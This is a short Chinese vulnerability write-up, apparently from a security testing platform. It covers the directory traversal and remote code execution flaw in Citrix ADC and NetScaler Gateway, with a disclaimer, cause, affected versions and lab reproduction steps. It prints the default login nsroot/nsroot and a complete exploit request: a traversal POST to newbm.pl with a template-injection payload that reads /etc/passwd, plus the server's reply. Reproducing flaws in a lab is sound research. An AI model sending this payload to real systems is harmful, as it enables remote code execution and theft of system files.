由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
No.2漏洞产生原因
Citrix ADC(NetScalers)中的目录穿越错误,这个错误会调用perl脚本,perl脚本用于将XML格式的文件附加到受害计算机,因此产生远程执行代码。注:Citrix NetScaler ADC应用交付控制器和Citrix NetScaler网关
No.3漏洞利用过程
1.pl文件未对NSC_USER参数传入进行过滤2.触发目录穿越3.在模板目录的XML文件写入命令4.模板引擎分析后执行命令
No.4漏洞影响范围
Citrix NetScaler ADC and NetScaler Gateway version 10.5Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1 Citrix ADC and Citrix Gateway version 13.0
No.5漏洞复现
下载 Citrix Gateway VPX for ESX Build 13.0-47.22https://www.citrix.com/downloads/citrix-gateway/
安装NSVPX-ESX运行.ovf文件后,会导入.vmdk文件并启动虚拟机
桥接模式 配置IP地址:192.168.2.170子网掩码:255.255.255.0网关地址:192.169.2.255然后选择4确认
访问 http://192.168.2.170默认用户和密码登录:nsroot/nsroot
利用目录穿越写入命令语句到newbm.pl文件中
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1Host: 192.168.2.170User-Agent: 1Connection: closeNSC_USER: ../../../netscaler/portal/templates/rab3itNSC_NONCE: nsrootContent-Length: 97url=http://example.com&title=rab3it&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]
HTTP/1.1 200 OKDate: Thu, 16 Jan 2020 06:25:07 GMTServer: ApacheX-Frame-Options: SAMEORIGINLast-Modified: Thu, 16 Jan 2020 06:25:07 GMTETag: W/"87-59c4286dda300"Accept-Ranges: bytesContent-Length: 135X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffKeep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8